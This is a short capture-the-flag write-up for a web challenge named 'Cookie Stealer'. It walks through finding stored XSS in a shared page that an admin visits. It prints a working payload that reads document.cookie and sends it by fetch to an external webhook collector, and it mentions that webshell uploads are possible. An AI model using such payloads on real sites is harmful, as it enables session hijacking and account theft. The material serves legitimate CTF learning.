# [EN] Cookie Stealer ###### tags: `Writeup` `Web` `English` > [name=FlyDragon] ## Step 1 http://lotuxctf.com:20005/ At the beginning, it's a regular login page where you can register or log in. <img src="https://hackmd.io/_uploads/BJ2Bo2W02.png" alt="photo" width="500" height="300"> After logging in, you can upload images and enter content, and you can `Share` or `Share to admin`. <img src="https://hackmd.io/_uploads/Sy7TohZAn.png" alt="photo" width="400" height="300"> Using `Share` creates a page named `{username}.php`, and `Share to admin` means that after creating it, `admin` will visit your page.  There are many places to upload a webshell, but RCE cannot get the flag. This challenge requires using XSS to steal the `admin`'s Cookie. ## Step 2 First, test if you can trigger XSS, enter the following JavaScript: ``` <script>alert(1);</script> ``` <img src="https://hackmd.io/_uploads/HkJDgaZA2.png" alt="photo" width="400" height=""> Successfully triggered.  Next, test if you can steal the visitor's cookie: ``` <script> var flag = document.cookie; fetch("{webhookurl}?cookie="+flag) </script> ``` After `Share`, successfully received your own cookie. > Note: You should change `{webhookurl}` to a site that can receive request e.g. https://webhook.site/  Using `Share to admin` will allow you to receive the flag. {%hackmd M1bgOPoiQbmM0JRHWaYA1g %}